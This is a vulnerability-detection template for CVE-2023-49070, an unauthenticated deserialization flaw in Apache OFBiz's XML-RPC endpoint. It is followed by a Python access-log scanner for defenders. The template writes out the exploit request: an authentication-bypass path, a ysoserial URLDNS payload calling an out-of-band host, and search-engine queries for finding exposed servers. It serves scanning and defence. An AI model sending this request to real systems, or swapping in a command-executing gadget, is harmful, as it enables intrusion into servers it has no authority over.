CVE-2023-49070.yaml
id: CVE-2023-49070

info:
  name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    Apache OFBiz is an enterprise resource planning (ERP) system from the Apache Software Foundation (USA) that provides a full suite of Java-based web application components and tools.
    Apache OFBiz versions before 18.12.10 contain a remote code execution vulnerability. Because XML-RPC is no longer maintained, an authenticated attacker can use XML-RPC to execute code remotely and take control of the server.
    FOFA: app="Apache_OFBiz"
    Hunter: app.name="OFBiz"
    ZoomEye: app:"Apache OFBiz"
  reference:
    - https://mp.weixin.qq.com/s/se43Z1NlwLWEul5FcT5nug
    - https://mp.weixin.qq.com/s/OYLKC_vPiyx0JzFX6Ia5FA
    - https://mp.weixin.qq.com/s/_QaoaiVJUcYLN_QCfuGSLQ
    - https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
    - https://seclists.org/oss-sec/2023/q4/257
    - https://twitter.com/Siebene7/status/1731870759130427726
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49070
    - https://issues.apache.org/jira/browse/OFBIZ-12812
  tags: seclists,cve,cve2023,apache,ofbiz,deserialization,rce
  created: 2024/01/05

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
  base64payload: ysoserial("URLDNS",reverseHost,"base64")

rules:
  r0:
    request:
      method: POST
      path: /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y
      headers:
        Content-Type: application/xml
      body: |
        <?xml version="1.0"?>
        <methodCall>
          <methodName>RCE</methodName>
          <params>
            <param>
              <value>
                <struct>
                  <member>
                    <name>RCE</name>
                    <value>
                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{base64payload}}</serializable>
                    </value>
                  </member>
                </struct>
              </value>
            </param>
          </params>
        </methodCall>
    expression: reverse.wait(5)
expression: r0()
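
A defender-side check for the request shape in rule `r0`, added here as an example and not part of the template file: it scans web access logs for hits on the OFBiz XML-RPC endpoint and notes the path parameter and `requirePasswordChange=Y` markers seen in the template's path. It assumes combined-format access logs; the names `classify` and `scan` are hypothetical and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jan/2024:10:01:02 +0000] "POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 512
198.51.100.7 - - [05/Jan/2024:10:01:09 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 401 310
203.0.113.20 - - [05/Jan/2024:10:02:00 +0000] "GET /webtools/control/main HTTP/1.1" 200 9000
"""

# client, method, request target and status from one access-log line
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, status, reasons) if the line targets the XML-RPC endpoint, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Drop ";..." path parameters from every segment before comparing the path.
    clean = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    if not clean.rstrip("/").endswith("/control/xmlrpc"):
        return None
    reasons = ["xmlrpc endpoint"]
    if ";" in path:
        reasons.append("path parameter in URL")
    query = parse_qs(parts.query, keep_blank_values=True)
    if "Y" in query.get("requirePasswordChange", []):
        reasons.append("requirePasswordChange=Y")
    if status.startswith("2"):
        reasons.append("2xx response")
    return client, int(status), reasons

def scan(log_text):
    """Classify every line and keep the ones that hit the endpoint."""
    hits = (classify(line) for line in log_text.splitlines())
    return [h for h in hits if h is not None]

if __name__ == "__main__":
    for client, status, reasons in scan(SAMPLE_LOG):
        print(client, status, ", ".join(reasons))
```

A hit that carries all four reasons matches the template's request line and is worth correlating with outbound DNS lookups from the OFBiz host around the same time.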